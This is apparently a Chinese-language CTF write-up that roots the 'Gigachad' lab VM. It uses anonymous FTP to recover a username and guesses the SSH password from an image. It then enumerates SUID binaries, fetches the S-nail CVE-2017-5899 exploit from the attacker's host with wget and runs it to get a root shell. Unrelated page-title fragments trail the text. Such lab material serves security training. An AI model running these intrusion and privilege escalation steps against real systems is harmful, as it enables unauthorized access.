Gigachad
信息搜集
┌──(root?kali)-[/home/kali]
└─# nmap 192.168.214.85
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-16 07:42 EDT
Nmap scan report for 192.168.214.85
Host is up (0.00011s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:73:76:3D (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
?
Nmap done: 1 IP address (1 host up) scanned in 13.22 seconds
?
┌──(root?kali)-[/home/kali]
└─# nmap 192.168.214.85 -p 21 -sC
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-16 07:43 EDT
Nmap scan report for bogon (192.168.214.85)
Host is up (0.00024s latency).
?
PORT STATE SERVICE
21/tcp open ftp
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-r-xr-xr-x 1 1000 1000 297 Feb 07 2021 chadinfo
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.214.76
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
MAC Address: 08:00:27:73:76:3D (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
?
Nmap done: 1 IP address (1 host up) scanned in 9.77 seconds靶機IP:192.168.214.85 FTP存在匿名登陸
┌──(root?kali)-[/home/kali]
└─# lftp 192.168.214.85 -u anonymous
Password:
lftp anonymous@192.168.214.85:~> ls -al
dr-xr-xr-x 2 1000 1000 4096 Feb 07 2021 .
dr-xr-xr-x 2 1000 1000 4096 Feb 07 2021 ..
-r-xr-xr-x 1 1000 1000 297 Feb 07 2021 chadinfo
lftp anonymous@192.168.214.85:/> get chadinfo
297 bytes transferred
lftp anonymous@192.168.214.85:/> exitfile一下得知是一個壓縮包文件
┌──(root?kali)-[/home/kali]
└─# file chadinfo
chadinfo: Zip archive data, at least v1.0 to extract, compression method=store直接讀取一下
┌──(root?kali)-[/home/kali]
└─# cat chadinfo
PK
0HR��??chadinfoUT �j `Zj `uxwhy yes,
#######################
username is chad
???????????????????????
password?
!!!!!!!!!!!!!!!!!!!!!!!
go to /drippinchad.png
PK
0HR��??��chadinfoUT�j `uxPKN� 一個用戶名chad,還有一個png路徑,接著前往web頁面查看內容
把文件保存到本地,原本以為是圖片隱寫,嘗試后發現不對,放到谷歌識圖上,得知是圖尋題,塔名為少女塔
用維基百科查詢得到了英文名maidenstower
因為一開始掃描靶機ip時發現了有ssh服務,接著用ssh進行連接
SSH連接靶機
userflag
chad@gigachad:~$ ls -al
total 20
drwxr-xr-x 4 chad chad 4096 Apr 16 06:58 .
drwxr-xr-x 3 root root 4096 Feb 7 2021 ..
dr-xr-xr-x 2 chad chad 4096 Feb 7 2021 ftp
drwx------ 3 chad chad 4096 Apr 16 06:58 .gnupg
-r-x------ 1 chad chad 32 Feb 7 2021 user.txt
chad@gigachad:~$ cat user.txt
0FAD8F4B099A26E004376EAB42B6A56Achad@gigachad:~$提權
chad@gigachad:~$ find / -user root -perm -4000 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/s-nail/s-nail-privsep
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/bin/passwd
/usr/bin/mount
/usr/bin/chfn
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/su
/usr/bin/gpasswd
/usr/bin/chsh發現了一個s-nail(CVE-2017-5899),用exploit進行搜索,得到了下面的內容
接著用kali將腳本保存下來,并開啟kali的http服務
┌──(root?kali)-[/home/kali/bash]
└─# searchsploit -m 47172Exploit: S-nail < 14.8.16 - Local Privilege EscalationURL: https://www.exploit-db.com/exploits/47172Path: /usr/share/exploitdb/exploits/multiple/local/47172.shCodes: CVE-2017-5899Verified: False
File Type: POSIX shell script, ASCII text executable
cp: overwrite '/home/kali/bash/47172.sh'? y
Copied to: /home/kali/bash/47172.sh
?
┌──(root?kali)-[/home/kali/bash]
└─# python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.214.85 - - [16/Apr/2025 08:03:47] "GET /47172.sh HTTP/1.1" 200 -靶機用wget獲取kali中下載的47172.sh腳本
chad@gigachad:~$ wget 192.168.214.76/47172.sh
--2025-04-16 07:09:33-- http://192.168.214.76/47172.sh
Connecting to 192.168.214.76:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 8479 (8.3K) [text/x-sh]
Saving to: ‘47172.sh.1’
?
47172.sh.1 100%[===================================>] 8.28K --.-KB/s in 0s
?
2025-04-16 07:09:33 (232 MB/s) - ‘47172.sh.1’ saved [8479/8479]因為是個條件競爭的腳本,存在一定的運氣,運氣好的運行腳本的次數就少,運氣不好的,次數就多
rootflag
It cannot be run by itself.
[.] Race #863 of 1000 ...
[+] got root! /var/tmp/.sh (uid=0 gid=0)
[.] Cleaning up...
[+] Success:
-rwsr-xr-x 1 root root 14424 Apr 16 07:12 /var/tmp/.sh
[.] Launching root shell: /var/tmp/.sh
# bash
root@gigachad:~# cd /root
root@gigachad:/root# ls
chad_real_identity.png root.txt
root@gigachad:/root# cat root.txt
832B123648707C6CD022DD9009AEF2FDroot@gigachad:/root#
(SpringBoot2.x整合Mybatis實現CURD操作和分頁查詢詳細項目文檔))
)
)
家電電源與智能控制技術研討會)
